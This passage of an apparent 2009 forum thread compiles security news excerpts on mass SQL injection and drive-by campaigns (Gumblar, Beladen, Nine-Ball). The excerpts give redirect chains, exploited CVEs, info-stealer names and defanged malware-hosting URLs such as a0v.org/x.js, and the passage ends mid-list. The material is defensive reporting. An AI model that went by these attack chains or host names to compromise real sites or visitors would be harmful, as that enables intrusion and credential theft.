500,000 Websites Hit By New Form Of SQL Injection In '08
- http://www.darkreading.com/shared/printableArticle.jhtml?articleID=214600046
Feb. 25, 2009 - "...An automated form of SQL injection using botnets emerged as the popular method of hacking Websites, according to a newly released report from the Web Hacking Incidents Database (WHID), an annual report by Breach Security and overseen by the Web Application Security Consortium (WASC). The report also found that attackers increasingly are targeting a Website's customers rather than the sensitive information in the site's database... Mass SQL Injection Bot attacks basically automate the infection process; the Nihaorr1 and Asprox botnets both deployed this method last year, according to the report... Government, security, and law enforcement organizations represented the biggest sector suffering from these attacks (32 percent), but that may, in part, be due to their more stringent disclosure rules, the report says. Next were information services (13 percent), finance (11 percent), retail (11 percent), Internet (9 percent), and education (6 percent)..."
* http://www.breach.com/resources/whitepapers/2008WHID.html


2009-04-29, 19:11

DNS redirect attack - Puerto Rico
- http://news.cnet.com/8301-1009_3-10228436-83.html
April 27, 2009 - "... A group calling itself the "Peace Crew" claimed that they used a SQL injection attack to break into the Puerto Rico registrar's management system... While the sites that visitors were -redirected- to were obviously not the legitimate sites, DNS redirects could be used to send unsuspecting Web surfers to phishing sites pretending to be banks where they would be prompted to provide sensitive information. People should use the SSL (Secure Sockets Layer) protocol for encrypting communications with sensitive sites and use anti-phishing technology in the browser that colors part of the URL address bar green or red based on the safety level of the site being visited..."

(Screenshot available at the URL above.)


2009-04-30, 12:32

SQL injections through Search Engine reconnaissance...
- http://ddanchev.blogspot.com/2009/04/massive-sql-injections-through-search.html
April 29, 2009 - "From the lone Chinese SQL injectors empowered with point'n'click tools for massive SQL injection attacks, to the much more efficient and automated botnet approach courtesy of, for instance, the ASProx botnet. The process of automatically fetching URLs from public search engines in order to build hit lists for verifying against remote file inclusion attacks and potential SQL injections, remains a commodity feature in a great number of newly released malware bots... A recently released malware bot is once again empowering the average script kiddie with the possibility to take advantage of the window of opportunity for each and every remotely exploitable web application flaw... Moreover, the IRC based bot is also featuring a console which allows manual exploitation or intelligence gathering for a particular site. Some of the features include:
- Remote file inclusion
- Local file inclusion checks ()
- MySQL database details
- Extract all database names
- Data dumping from column and table
- Notification issued when Google bans the infected host for automatically using it
... The window of opportunity for abusing a particular web application flaw is abused much more efficiently due to the fact that reconnaissance data about its potential exploitability is already crawled by a public search engine - often in real time. The concept, as well as the features within the bot are not rocket science - that's what makes it so easy to use."


2009-05-30, 01:07

Mass Injection Compromises More than Twenty-Thousand Web Sites
- http://securitylabs.websense.com/content/Alerts/3405.aspx
05.29.2009 - "Websense... has detected that a large compromise of legitimate Web sites is currently taking place around the globe. Thousands of legitimate Web sites have been discovered to be injected with malicious Javascript, obfuscated code that leads to an active exploit site. The active exploit site uses a name similar to the legitimate Google Analytics domain (google-analytics.com), which provides statistical services to Web sites. This mass injection attack does -not- seem related to Gumblar. The location of the injection, as well as the decoded code itself, seem to indicate a new, unrelated, mass injection campaign... The exploit site is laden with various attacks. After successful exploitation, a malicious file is run on the exploited computer. The executed malware file has a very low AV detection rate*..."
* http://preview.tinyurl.com/lphk6r
File sysCF.tmp.exe received on 2009.05.29 17:04:04 (UTC) - Virustotal.com
Result: 4/39 (10.26%)


2009-05-30, 21:13

- http://www.theregister.co.uk/2009/05/30/mass_web_infection/
30 May 2009 - "... has spread to about 30,000 websites run by businesses, government agencies and other organizations, researchers warned Friday. The infection sneaks malicious javascript onto the front page of websites, most likely by exploiting a common application that leads to a SQL injection, said Stephan Chenette, manager for security research at security firm Websense. The injected code is designed to look like a Google Analytics script, and it uses obfuscated javascript, so it is hard to spot. The malicious payload silently redirects visitors of infected sites to servers that analyze the end-user PC. Based on the results, it attempts to exploit one or more of about 10 different unpatched vulnerabilities on the visitor's machine. If none exist, the webserver delivers a popup window that claims the PC is infected in an attempt to trick the person into installing rogue anti-virus software..."


2009-06-02, 06:33

- http://securitylabs.websense.com/content/Blogs/3408.aspx
06.01.2009 - "... Mass compromises... regularly take place, because attackers commonly use server-side vulnerabilities in an automated way to infiltrate legitimate Web sites and inject them with malicious code... The malicious code injected in the Beladen attacks* uses an obfuscation method that starts with the initialization of a long, obfuscated string parameter. This gets de-obfuscated and then executed by the browser. This kind of obfuscation can employ many levels of obfuscation - where obfuscated code leads to more obfuscated code, and so on... the malicious URL name redirects to a site with a name very similar to the Google Analytics service (this service exists at 'google-analytics.com'). Once redirection occurs, the user is redirected again to the exploits payload site, Beladen. Beladen uses wildcarded subdomains, so each time Beladen is used by the intermediate redirecting site, a different subdomain is used... Beladen is the exploit site where several exploits try to compromise the redirected browser. Beladen means loaded in German - a suitable name because the site is loaded with exploits. Once the browser is redirected to Beladen, there is another internal redirect check that verifies the referrer, to subvert any direct mining attempts to the site's obfuscated exploit code... the hosting malicious site was located at the IP subnet block of, which was part of the Russian Business Network (RBN). The threat this time comes from the IP block of, which is part of AS48031 NOVIKOV located in the Ukraine. According to our log data, this autonomous system has been quite busy spreading malicious code using Scareware, Rogue Antivirus software, and exploit sites (including the latest PDF exploits). The IP address hosting the specific attack we described holds yet another typosquatt Google-like domain..."
* http://securitylabs.websense.com/content/Alerts/3405.aspx


2009-06-05, 01:36

- http://securitylabs.websense.com/content/Alerts/3412.aspx
06.04.2009 - "... the payload site for the mass compromise known as Beladen, has changed from Beladen to Shkarkimi. The new site is hosted on the same IP address as Beladen and the exploits it serves are the same. The obfuscated typosquatting domain of Google-Analytics leading to the exploit site Shkarkimi is still massively injected. We can confirm that, as of the time of writing, around 30,000 Web Sites are injected with code that eventually leads to Shkarkimi. For more details about this attack, please see our blog on Beladen*..."
* http://securitylabs.websense.com/content/Blogs/3408.aspx
... shkarkimi has a very similar network topology to Beladen. Yesterday, Google Security Team posted a list of the top ten malware domains which included googleanalystlcs.net [ note the typosquatt ] as one of the top 10 malware sites**..."
** http://googleonlinesecurity.blogspot.com/2009/06/top-10-malware-sites.html

(Screenshots available at the first URL above.)


2009-06-07, 12:09

- http://blog.trendmicro.com/another-wave-of-mass-compromises-serve-info-stealers/
June 6, 2009 - "Aside from Gumblar, another incident of mass compromised web sites have been seen in the wild lately, and has raised as much concern as the former. This one starts with the same technique: a malicious IFRAME unknowingly embedded in a legitimate website, injected via JavaScript. The said IFRAME redirects to another IFRAME, which in turn executes obfuscated JavaScript code. Once decoded, it tries to connect to URLs to download exploits for several vulnerabilites in order to gain access of the affected user’s system. The obfuscated malicious JavaScript is detected as JS_DROPPER.LOK while the URLs that trigger the download of the exploits are detected as TROJ_SHELLCOD.HT. Upon successful exploitation, other malicious files are then downloaded, which Trend Micro detects as TROJ_MEDPINCH.B, and TROJ_MEDPINCH.A. TROJ_MEDPINCH.B connects to other URLs to download info-stealers SPYW_IEWATCHER and TSPY_LDPINCH.CBS. On the other hand, TROJ_MEDPINCH.A drops yet another info-stealer: TSPY_LDPINCH.ASG. TSPY_LDPINCH.ASG steals account information related to the following applications: This spyware steals user names, passwords, and other account and installation information of the following applications:
• Microsoft Outlook
• Mirabilis ICQ
• Opera Software
• The Bat!
• Total Commander
• Trillian
Though this compromise occurs within close proximity days after Gumblar’s last attack, no mention of the Gumblar.{BLOCKED} domain appears in the code. This attack may indeed be a separate one from Gumblar, or possibly be inspired by it. Related URLs are already blocked by the Smart Protection Network, but it is highly advised that user’s patch their system to minimize the chances of exploit through the following updates:
* Vulnerability in Windows Explorer Could Allow Remote Execution MS06-057
- http://www.microsoft.com/technet/security/bulletin/ms06-057.mspx
* Buffer overflow in Apple QuickTime 7.1.3
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015
* Buffer overflow in the WZFILEVIEW.FileViewCtrl.61 ActiveX control
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6884
* Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution - MS06-014
- http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx
* Microsoft Internet Explorer 7 Memory Corruption Exploit - MS09-002
- http://www.microsoft.com/technet/security/bulletin/MS09-002.mspx "


2009-06-08, 21:08

- http://www.securityfocus.com/brief/970
2009-06-08 - "The drive-by-download threat, Grumblar, continues to cause widespread infection, through the number of Web sites compromised with the malicious code appears to have declined since late May, according to Web security firm Websense. The multi-stage threat, which first compromises Web sites to install malicious code that is then used to infect visitors' PCs, rocketed eight-fold in mid-May, according to an update posted to Websense's research blog on Friday*. Attackers use stolen FTP credentials to embed the first stage of the attack on legitimate Web sites. Gary Warner, a professor of digital forensics at the University of Alabama, document an investigation he and his students performed on a compromised Facebook group. The group, which boasted 40,000 members, contained a link to a malicious site that attempted to infect visitors with Grumblar... A malicious PDF file uploaded to victim's systems by Grumblar contains the phrase, "Boris likes horilka," according to Warner's blog**. Horilka is the Ukrainian word for vodka. The software steals FTP credentials, sends spam, installs fake antivirus software, hijacks Google search queries, and disables security software."
* http://securitylabs.websense.com/content/Blogs/3414.aspx
** http://garwarner.blogspot.com/2009/06/gumblars-48000-compromised-domains.html
June 06, 2009 - "... 48,000 compromised domains..."


2009-06-11, 12:36

- http://windowssecrets.com/comp/090611#story1
2009-06-11 - "Going by such names as Gumblar, JSRedir-R, Martuz, and Beladin, a new generation of malware has managed to surreptitiously place malicious JavaScript code on tens of thousands of popular Web sites. The hacker scripts try to infect site visitors and then attempt to use their compromised PCs to spread the infection to yet other sites. Over the past month, the security services ScanSafe* and Sophos** have reported infections on such major Web sites as ColdwellBanker.com, Variety.com, and Tennis.com. Niels Provos reported in the Google security blog*** on June 3 that sites infected with Gumblar numbered about 60,000. Visitors became susceptible to infection simply by opening the sites in Internet Explorer..."
* http://blog.scansafe.com/journal/2009/5/8/google-serps-redirections-turn-to-bots.html
May 8, 2009

** http://www.sophos.com/blogs/gc/g/2009/05/14/malicious-jsredir-javascript-biggest-malware-threat-web/
May 14th, 2009

*** http://googleonlinesecurity.blogspot.com/2009/06/top-10-malware-sites.html
June 3, 2009 - "... malware researchers reported widespread compromises pointing to the domains gumblar .cn and martuz .cn, both of which made it on our top-10 list. For gumblar, we saw about 60,000 compromised sites; Martuz peaked at slightly over 35,000 sites. Beladen .net was also reported to be part of a mass compromise, but made it only to position 124 on the list with about 3,500 compromised sites..."

- http://blog.trendmicro.com/stolen-ftp-credentials-key-to-gumblar-attack/
June 10, 2009 - "Analysts of the recent Gumblar attack that compromised thousands of legitimate websites stated that the unauthorized modifications in the websites were possibly executed not only through SQL injection. The compromise was also reportedly done through accessing web server files through stolen FTP credentials gathered by one of the final malware payloads of the same attack. The infection chain initiated by the malicious scripts HTML_JSREDIR.AE and HTML_REDIR.AC end with the download of TSPY_KATES.G into the affected system. The data-stealer, TSPY_KATES.G installs itself as a driver on the affected system and monitors network traffic. It also steals FTP account information, which includes user names and passwords. Analysts believe that through TSPY_KATES.G Gumblar was able to compromise more sites than when it initially launched the attack. SQL injections only work on certain conditions (if the website is vulnerable enough to allow such injections), and give cybercriminals a limited access to the targeted webpage. Obtaining FTP credentials however grant the cybercriminals the same level of access as what the website administrator has, regardless of any security measures used..."


2009-06-16, 22:15

Nine-Ball - mass injection, malicious site, malicious code
- http://securitylabs.websense.com/content/Alerts/3421.aspx
06.16.2009 - "Websense... has detected another large mass injection attack in the wild after the Beladen and Gumblar attacks. We are calling this mass compromise Nine-Ball because of the final landing site. We have been tracking the Nine-Ball mass compromise since 6/03/2009. To date, over 40,000 legitimate Web sites have been compromised with obfuscated code that leads to a multi-level redirection attack, ending in a series of drive-by exploits that if successful install a trojan downloader on the user's machine... If a user visits one of the infected sites, they are redirected through a series of different sites owned by the attacker and brought to the the final landing page containing the exploit code (the redirection path is shown below). The final landing page records the visitors's IP address. When visited for the first time, the user is directed to the exploit payload site. But when visited again from the same IP address, the user is directed to the benign site of ask.com... After redirection, the exploit payload site returns highly obfuscated malicious code. The malicious code attempts to exploit MS06-014 (targeting MDAC) and CVE-2006-5820 (targeting AOL SuperBuddy), as well as employing exploits targeting Acrobat Reader and QuickTime. The MS06-014 exploit code will download a Trojan dropper with low AV detection rate*. This dropper drops a dll with the name SOCKET2.DLL to Windows' system folder. This file is used to steal user information. The malicious PDF file, served by the exploit site, also has very low AV detection rate**..."
* http://www.virustotal.com/analisis/62254bf6a13a438bc53c0f3745c622c5c1604aa37e4f866036a1e94c35cc68f7-1245137075
File l.php ... Result: 7/40 (17.50%)

** http://www.virustotal.com/analisis/f9565077d685764b9e219358d4a64e2165fd8ac157fa46c955a5e35112aad894-1245160253
File PDF.php ... Result: 3/41 (7.32%)

(Screenshot available at the Websense URL above.)


2009-06-18, 03:33

- http://preview.tinyurl.com/nz8pu2
2009-06-17 E-week.com - "... "We are not releasing the names of the sites compromised," said Stephan Chenette, manager of threat research at Websense. "We've attempted to contact a subset of the compromised sites to let them know that they've been infected … No particular vertical was targeted"... in a bid to sniff out security researchers, the compromised sites are set to check if they have been visited more than once by the same IP address. If a visitor has been to the site more than once, he or she will be directed to ask.com instead of to the attack site. While Nine-Ball is the third mass Website compromise report to make headlines in recent weeks, Chenette said it appears to be distinct from the others. "The Nine-Ball mass compromise is not related to either Beladen or Gumblar, but like the previous mass compromises, many of the machines owned by the attacker are located in the Ukraine," Chenette said..."


2009-06-22, 23:47

- http://securitylabs.websense.com/content/Blogs/3422.aspx
06.22.2009 - "... Nine-Ball attack compromised over 40,000 legitimate Web sites in an ongoing campaign... By analyzing the tens of thousands of Web sites compromised in this attack we can see that the majority of infected sites are in the United States (71%)... A confusing factor for most who attempt to analyze this attack is that there is no clear single malicious redirection path. Users who visit an infected site are silently taken through a series of varied redirectors and the final landing page is not always the same... The valid string, in the Nine-Ball attacks, is an iframe. When this iframe is interpreted by the browser, the browser silently visits the iframe location... Once exposed to a Nine-Ball exploit site, several exploits will be delivered to the user's browser. Among them are:
• MS06-014 (MDAC)
• CVE-2006-5820 (AOL SuperBuddy)
• CVE-2007-0015 (QuickTime)
• Adobe Acrobat Reader,
The exploit code that targets Acrobat Reader will download a malicious PDF file from the exploit site. The PDF file integrates 3 vulnerabilities:
• CVE-2008-1104
• CVE-2007-5659
• CVE-2009-0927 ..."

(Screenshots available at the URL above.)


2009-06-25, 12:55
More on Nine-ball...

- http://blog.trendmicro.com/another-messy-mass-compromise-emerges/
June 22, 2009 - "... Trend Micro was alerted of the emergence of another mass compromise, dubbed Nine Ball, for the same reason Gumblar was named Gumblar, only that this time, the Nine Ball domain is only one of hundreds of landing pages users can be redirected to... the infection starts when a user accesses a compromised site that automatically redirects him/her to several sites. These sites were actually a trio of malicious domains (specific .KZ and .TW sites) constantly used by attackers in their scheme of redirecting users to a malicious IP address registered somewhere in Ukraine. The chain ends when the user’s browser lands on a page that contains exploits for vulnerabilities in various software including Adobe Acrobat, Adobe Shockwave... Both PDF and SWF files lead to binary payload that look similar to a new kind of information stealer detected as TSPY_SILENTBAN.U. TSPY_SILENTBAN.U installs itself as a Browser Helper Object (BHO) on the affected system and monitors Internet activity. Gathered information are then sent to a remote user using HTTP POST. Note that as of the writing, the binary payload retrieved from the attack uses this spyware. It is more likely that in future attacks, other payloads can be used... Information on the vulnerabilities exploited in this attack can be found on the following pages:
Last revised:04/28/2009
Last revised:11/25/2008
Last revised:11/15/2008 ..."


2009-07-03, 13:47

Cold Fusion sites compromised
- http://isc.sans.org/diary.html?storyid=6715
Last Updated: 2009-07-03 09:35:14 UTC ...(Version: 2) - "There have been a high number of Cold Fusion web sites being compromised in last 24 hours... It appears that the attackers are exploiting web sites which have older installations of some Cold Fusion applications. These applications have vulnerable installations of FCKEditor, which is a very popular HTML text editor, or CKFinder, which is an Ajax file manager. The vulnerable installations allow the attackers to upload ASP or Cold Fusion shells which further allow them to take complete control over the server. The attacks we've been seeing in the wild end up with inserted <script> tags into documents on compromised web sites. As you can probably guess by now, the script tags point to a whole chain of web sites which ultimately serve malware and try to exploit vulnerabilities on clients...
Update: ... It appears that there are two attack vectors (both using vulnerable FCKEditor installations though) that the attackers are exploiting. First, version 8.0.1 of Cold Fusion installs a vulnerable version of FCKEditor which is enabled by default. This is very bad news, of course, since the attacker can just directly exploit FCKEditor to upload arbitrary files on affected servers. Information on how to disable this is available on the ColdFusion web site at http://www.codfusion.com/blog/post.cfm/cf8-and-fckeditor-security-threat
The second attack vector is again through vulnerable FCKEditor installations, but which are this time dropped through 3rd party application. One of the common applications that has been seen in attacks is CFWebstore, a popular e-commerce application for ColdFusion. Older versions of CFWebstore used vulnerable FCKEditor installations - if you are using CFWebstore make sure that you are running the latest version and that any leftovers have been removed."

- http://www.ocert.org/advisories/ocert-2009-007.html
2009-07-03 - "... A patch and a new FCKeditor version will be made available on Monday July 6th 16:00 CET, this advisory will be updated with detailed information about the issue and a security patch. In the meantime we strongly recommend to implement the following mitigation instructions:
* removed unused connectors from 'editor\filemanager\connectors'
* disable the file browser in config.ext
* inspect all fckeditor folders on the server for suspicious files that may have been previously uploaded, as an example image directories (eg. 'fckeditor/editor/images/...') are well known target locations for remote php shells with extensions that match image files
* remove the '_samples' directory
Affected version: FCKeditor <= 2.6.4
(version 3.0 is unaffected as it does not have any built-in file browser)
Fixed version: FCKeditor >= (to be released on 2009-07-06 16:00 CET) ..."

- http://www.fckeditor.net/download
Current Release -
July 6, 2009

- http://secunia.com/advisories/35712/2/
Release Date: 2009-07-07
Critical: Highly critical
Solution: Update to version

> http://www.us-cert.gov/current/index.html#fckeditor_releases_version_2_6

- http://blogs.adobe.com/psirt/2009/07/potential_coldfusion_security.html
July 3, 2009


2009-07-04, 00:07

Gumblar invades Best Buy
- http://blog.trendmicro.com/gumblar-invades-best-buy/
July 2, 2009 - "Earlier today, Trend Micro... spotted a (potentially harmful) URL that redirects users from the Best Buy domain site. Users who visit www.bestbuy.com, as it turns out, are redirected to the URL, hxxp ://pics. bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f
(hxxp = http, and without the spaces). The compromised page in the domain is found to be the landing page where visitors can choose the language to be used as they browse within the site. Threat Research Manager, Ivan Macalintal, further identifies that a GEO-IP check happens prior to displaying the said landing page... The WHOIS screenshot of the .CN site states that it has been created just last June 4, 2009 by the same old criminals.
Further investigation shows that the first .CN site is actually located in Germany and is used by attackers in Ukraine. Suffice it to say, the Russkranians are the culprits once again. Best Buy has been informed of the said URL redirections and is resolving the matter as of this writing..."

(Screenshots and more detail at the TrendMicro URL above.)


2009-07-16, 12:32

(MS Office Web Components) OWC exploits used in SQL injection attacks
- http://isc.sans.org/diary.html?storyid=6811
Last Updated: 2009-07-16 08:38:21 UTC - "... The SQL injection attempt looks very much like the one we've been seeing for month – the attacker blindly tries to inject obfuscated SQL code... they are injecting a script code pointing to f1y .in, which is a known bad domain. This script contains links to two other web sites (www .jatrja.com and js.tongji. linezing .com [DO NOT VISIT]) serving malicious JavaScript that, besides exploits for some older vulnerabilities, also include the exploit for the OWC vulnerability. The exploits end up downloading a Trojan (of course, what else) which currently has pretty bad detection (VT link*) – only 15 AV programs detecting it, luckily, some major AV vendors are there. If you haven't set those killbits** yet, be sure that you do now because the number of sites exploiting this vulnerability will probably rise exponentially soon."
* http://www.virustotal.com/analisis/055757dfc4ffd9a3bc1a53fe965881dfb56268bfc7833968a1b26675376dda0a-1247733262

** http://support.microsoft.com/kb/973472#FixItForMe

- http://blog.trendmicro.com/massive-sql-injection-ensues/
July 17, 2009


2009-08-14, 14:22

Multiple JS site injections/compromises...
- http://securitylabs.websense.com/content/Blogs/3461.aspx
08.14.2009 - "Recently, since Microsoft released information about new vulnerabilities in MS Office and DirectShow in July, attacks spreading through the infection of thousands of legitimate Web sites have increased sharply in the wild... The script redirects to four malicious pages which capitalize on different vulnerabilities. Their targeting vulnerabilities are:
• Firefox Corrupt JIT state after deep return from native functionHeap (MFSA 2009-41);
• Microsoft DirectShow(msvidctl.dll) vulnerability (MS09-032);
• Microsoft Office Web Components Spreadsheet ActiveX vulnerability (MS09-043);
• Adobe Acrobat and Reader Collab 'getIcon()' JavaScript Method Remote Code Execution Vulnerability (CVE-2009-0927).
The third feature of the injection campaign is the constantly evolving injection codes. It seems that the attackers use a randomizer to generate this kind of JavaScript, but ultimately they all point to similar exploits... obfuscated JavaScript is the most important means of injection, taking up over 50 percent of the total. In summary, all of these injection methods are easy to implement for attackers and difficult to detect for users, meaning that more and more innocent users are involved in this injection campaign. This campaign not only targets mass college Web sites, but is also spreading widely in other sites in China. At the moment, the number of compromised college sites is still very high, maintaining a level of around 800 sites..."


2009-08-25, 00:13

SQL injection attacks hit 57K sites
- http://www.theregister.co.uk/2009/08/24/mass_web_infection/
24 August 2009 - "Malicious hackers have managed to infect about 57,000 web pages with a potent exploit cocktail that targets a variety of vulnerable applications to surreptitiously install malware on visitor machines. The exploits install an assortment of nasty software, including Gologger, a keystroke logging trojan, and a backdoor that attempts to connect to a website hosted in China, according to Mary Landesman, a researcher at ScanSafe, a company that protects end users from malicious websites. The attackers were able to plant a malicious iframe in the pages by exploiting SQL injection vulnerabilities. Once in place, the script silently pulls down javascript from a0v .org** that silently runs while people are visiting one of the infected websites... SQL injection attacks exploit weaknesses in web applications that fail to adequately scrutinize text that users enter into search boxes and other web fields. The attacks have the effect of passing powerful commands to the website's back-end database. Landesman's report is available here*."
* http://blog.scansafe.com/journal/2009/8/21/up-to-55k-compromised-by-potent-backdoordata-theft-cocktail.html
August 21, 2009

> http://www.threatexpert.com/report.aspx?md5=131098d54e4c5ffc47e577fd1b45805c
16 August 2009 - "... The following Internet Connection was established:
Server Name
qirueixzz. 3322 .org ..."

> http://www.virustotal.com/analisis/1f364808db522b7d7b07244ff8cff8bf31769de692e4bad3d5b5996b62984194-1249319276
File ae563af77535163a1562cc1106ddf342- received on 2009.08.03 17:07:56 (UTC)
Result: 6/41 (14.63%)

> http://www.virustotal.com/analisis/572da9d70ad6cc88540766b8ebaf5750ae25481f46e00264cf1d5afa0b781b12-1249741982
File mam.exe received on 2009.08.08 14:33:02 (UTC)
Result: 26/41 (63.41%)

** http://centralops.net/co/DomainDossier.aspx
Country: CN


2009-08-27, 04:12
FYI... [Please DO NOT visit these domains as they are distributing malware both through the files they are peddling and via exploits.]

Following the Injection - a0v .org
- http://securitylabs.websense.com/content/Blogs/3465.aspx
08.26.2009 - "... The site that has been injected in this campaign is a 35-day-old domain called a0v.org. The injection is in plain text, non-obfuscated script tags... There is no mercy shown with the frequency of the injections, which confirms that this injection is an automated process, as most injections are... Once a user browses to an infected Web site, the user is redirected to execute the injected script at hxxp ://a0v .org/ x.js... the first takes the user to exploit sites just down the chain, and the second takes the user to a log server established by the baddies... The next stop in the exploit chain is hxxp ://game163 .info/oday/index .html... game163.info is also a fresh domain, registered just 23 days ago. Its source goes to even further redirects in the same site. But before it decides where to go, it checks whether the user's browser is Microsoft Internet Explorer 7, using a hex-represented string for "msie 7"... Following is a summary of all the exploits used, from the last one discovered to the oldest:
• Adobe Flash, Acrobat Reader CVE-2009-1862
• Microsoft Office Web Components CVE-2009-1136
• Microsoft Internet Explorer XML Parsing CVE-2008-4844
• Microsoft DirectShow (msvidctl.dll) CVE-2008-0015 - Suspected\Disabled
• Microsoft Data Access Components (MDAC) CVE-2006-0003
The exploits are served from multiple replicated Web sites, bearing the exact same code and structure as game163 .info... The newest exploit used in the chain is Adobe Flash and Acrobat Reader CVE-2009-1862 -- alerted on at the end July, and the most troublesome one, due to two facts:
1) Today, most users don't bother to update their versions of Flash/Acrobat.
2) We've recently received reports (in the middle of August) showing almost the same exploit code (with only minor variations in syntax) with an embedded malicious Flash file exploiting CVE-2009-1862 and holding only 2/42 and 0/42 detection rates by vendors, respectively. The results for the malicious Flash file exploiting this vulnerability in this attack are still very low, with only 5/41*, and the related exploit page with only 4/41**. Combine those two facts together, and you have a major breach that allows the attackers to do a great deal of damage. Similar mass injections happen around the clock, capitalizing on the latest exploits that rely on the two facts listed above, and holding different obfuscated source codes and payloads. Those facts can only suggest the large number of infected users from such mass compromises."
* http://www.virustotal.com/analisis/f1658c4938bb1913e92e397561116bc839cebb6d07b7f7f4d5d2df13398d0744-1251148350
File xp-swf.txt received on 2009.08.24 21:12:30 (UTC)
Result: 5/41 (12.20%)

** http://www.virustotal.com/analisis/6266e1fbe7129b05cc64963a6bb4b93b733d0f367fc0825c74560c80a7263303-1251295435
File ex1.txt received on 2009.08.26 14:03:55 (UTC)
Current status: finished
Result: 4/41 (9.76%)


2009-08-28, 17:26

Another mass compromise attack
- http://blog.trendmicro.com/bkdr_refpron-in-new-mass-compromise/
Aug. 28, 2009 - "Trend Micro threat analysts were alerted to another mass compromise attack affecting around 55,000 consumer-oriented sites spread throughout Canada, China, the United Kingdom, and India as of the first report. This incident is a painful reminder of the persisting risk of unprotected Web-surfing. In this particular case, the malicious scripts injected in the legitimate sites lead to other sites that eventually resolve to the download of the following backdoor programs and components:
• axa0727.exe-1 (BKDR_REFPRON.FH)
• d.binaxa072776988 (TROJ_REFPRON.FI)
• ms.binaxa0727588773 (TROJ_REFPRON.FJ)
• so.binaxa0727737721 (BKDR_REFPRON.FH)
The backdoors drop other components and connect to other IP addresses to download other malware with further the risk for users... As of this writing, searching for the offending script yields 99,000 results."


2009-09-15, 17:27

2009 - Top Cyber Security Risks
- http://www.sans.org/top-cyber-security-risks/
September 2009 - "Two risks dwarf all others, but organizations fail to mitigate them... attack data from TippingPoint intrusion prevention systems protecting 6,000 organizations, vulnerability data from 9,000,000 systems compiled by Qualys, and additional analysis... current data - covering March 2009 to August 2009 - from appliances and software in thousands of targeted organizations to provide a reliable portrait of the attacks being launched and the vulnerabilities they exploit...
Executive Summary
Priority One: Client-side software that remains unpatched.
Waves of targeted email attacks, often called spear phishing, are exploiting client-side vulnerabilities in commonly used programs such as Adobe PDF Reader, QuickTime, Adobe Flash and Microsoft Office. This is currently the primary initial infection vector used to compromise computers that have Internet access. Those same client-side vulnerabilities are exploited by attackers when users visit infected web sites...
Priority Two: Internet-facing web sites that are vulnerable.
Attacks against web applications constitute more than 60% of the total attack attempts observed on the Internet. These vulnerabilities are being exploited widely to convert trusted web sites into malicious websites serving content that contains client-side exploits. Web application vulnerabilities such as SQL injection and Cross-Site Scripting flaws in open-source as well as custom-built applications account for more than 80% of the vulnerabilities being discovered. Despite the enormous number of attacks and despite widespread publicity about these vulnerabilities, most web site owners fail to scan effectively for the common flaws and become unwitting tools used by criminals to infect the visitors that trusted those sites to provide a safe web experience..."
(Charts available at the URL above.)

- http://securitylabs.websense.com/content/Blogs/3476.aspx
09.15.2009 - "... Websense Security Labs identified a 233 percent growth in the number of malicious sites in the last six months and a 671 percent growth over the last year..."


2009-10-21, 11:30

Gumblar attacks surge again
- http://www.pcworld.com/businesscenter/article/173954/researchers_see_gumblar_attacks_surge_again.html
October 20, 2009 - "... In May, thousands of Web sites were found to have been hacked to serve up an iframe, which is a way to bring content from one Web site into another. The iframe led to the "gumblar.cn" domain. Gumblar would then try to exploit the user's PC via software vulnerabilities in Adobe Systems products such as Flash or Reader and then deliver malicious code. Gumblar has also now changed its tactics. Rather than hosting the malicious payload on a remote server, the hackers are now putting that code on compromised Web sites, vendors IBM and ScanSafe say. It also appears Gumblar has been updated to use one of the more recent vulnerabilities in Adobe's Reader and Acrobat programs, according to IBM's Internet Security Systems Frequency X blog*. The hackers know that it's only a matter of time before a malicious domain is shut down by an ISP. The new tactic, however, "gives them a decentralized and redundant attack vector, spread across thousands of legitimate websites around the world," IBM said... The hackers behind Gumblar have also taken to forcibly injecting a malicious iframe into forums, according to a blog post from ScanSafe***. It means that people become victim to a so-called drive-by attack, where they are instantly exposed to malicious content from elsewhere when visiting a legitimate site..."
* http://blogs.iss.net/archive/GumblarReloaded.html
October 19, 2009 - "... Coverage for the updated Trojan is still very low according to an analysis done through VirusTotal**..."
** http://www.virustotal.com/analisis/b6d5386298ec44cf220b1768a9fdc3b0a6d38f078d233c9d8edf761fe9589362-1255712244
File 1952405D00EE6FBD3E0000E9F4250F00643110CC.exe received on 2009.10.16 16:57:24 (UTC)
Result: 6/41 (14.63%)

*** http://blog.scansafe.com/journal/2009/10/15/gumblar-website-botnet-awakes.html
October 15, 2009

- http://google.com/safebrowsing/diagnostic?site=gumblar.cn/
"... last time suspicious content was found on this site was on 2009-10-22... this site has hosted malicious software over the past 90 days. It infected 6674 domain(s)..."
"... last time suspicious content was found on this site was on 2009-10-26... this site has hosted malicious software over the past 90 days. It infected 6381 domain(s)..."


2009-10-28, 10:25

6 million pwnd - Mass web infections spike
- http://sunbeltblog.blogspot.com/2009/10/dangerous-www-in-3q09-early-6-million.html
October 27, 2009 - "Dasient web security firm of Palo Alto, Calif., published some dismal numbers on its blog today. The number of infected pages on the web increased significantly in the third quarter and more than a third of infected sites that are fixed are quickly reinfected, they said. The company said its malware analysis platform found more than 640,000 infected sites with a total of 5.8 million pages in the quarter. They compare that to the three million infected pages that Microsoft reported in the first quarter of the year.
The attacks:
-- JavaScript (54.8%)
-- iFrame (37.1%)
-- "other" (8.1%)
... with that preponderance of JavaScript malware, if you haven’t updated your Adobe Reader and Acrobat installations recently, you might do so. Dasient blog here*."
* http://blog.dasient.com/2009/10/new-q309-malware-data-and-dasient.html
October 27, 2009

- http://www.theregister.co.uk/2009/10/27/mass_website_compromises_spike/
27 October 2009


2009-11-05, 20:13

Media-servers.net compromised
- http://securitylabs.websense.com/content/Alerts/3500.aspx
11.05.2009 - "Websense... has detected that the site media-servers.net has been compromised and injected with malicious code. The Web site belongs to a high-profile advertiser on the Internet realm. It's important to note that media-servers.net serves advertising content from ad.media-servers.net, and that this site is clean. The injected code is part of an ongoing mass injection campaign that compromised thousands of legitimate Web sites... The exploits associated with this attack are:
• Microsoft DirectShow CVE-2008-0015
• Microsoft Snapshot Viewer CVE-2008-2463
• Microsoft Data Access Components (MDAC) CVE-2006-0003
• AOL ConvertFile() remote buffer overflow exploit
There is also an autoloading malicious PDF file that holds the next vulnerabilites:
